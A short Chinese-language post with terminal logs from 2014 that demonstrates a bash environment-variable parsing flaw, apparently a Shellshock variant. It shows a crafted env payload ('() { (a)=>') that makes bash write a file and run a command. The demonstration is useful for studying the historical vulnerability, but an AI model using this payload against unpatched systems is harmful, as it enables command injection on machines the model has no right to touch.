一個linux下的bash安全漏洞

　　1. 通過設(shè)置一個特殊的環(huán)境變量的env，能間接地查到到linux命令的屬性，如下：

　　[2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

　　ls: cannot access date: No such file or directory

　　[2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>' bash -c 'date'

　　bash: X: line 1: syntax error near unexpected token `='

　　bash: X: line 1: `'

　　bash: error importing function definition for `X'

　　[2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

　　-rw-rw-r--. 1 david david 0 Sep 27 13:01 date

　　[2014-09-27 13:01:27 david@davidcchen ~]$

　　2. 一次運行環(huán)境變量。

　　[2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

　　zsh 4.3.10 (x86_64-redhat-linux-gnu)

　　[2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

　　GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

　　Copyright (C) 2009 Free Software Foundation, Inc.

　　License GPLv3+: GNU GPL version 3 or later

　　This is free software; you are free to change and redistribute it.

　　There is NO WARRANTY, to the extent permitted by law.

　　[2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>' bash -c echo date; cat echo; rm echo

　　bash: X: line 1: syntax error near unexpected token `='

　　bash: X: line 1: `'

　　bash: error importing function definition for `X'

　　Sat Sep 27 13:03:52 CST 2014

　　---------->成功運行date命令

　　[2014-09-27 13:03:52 david@davidcchen ~]$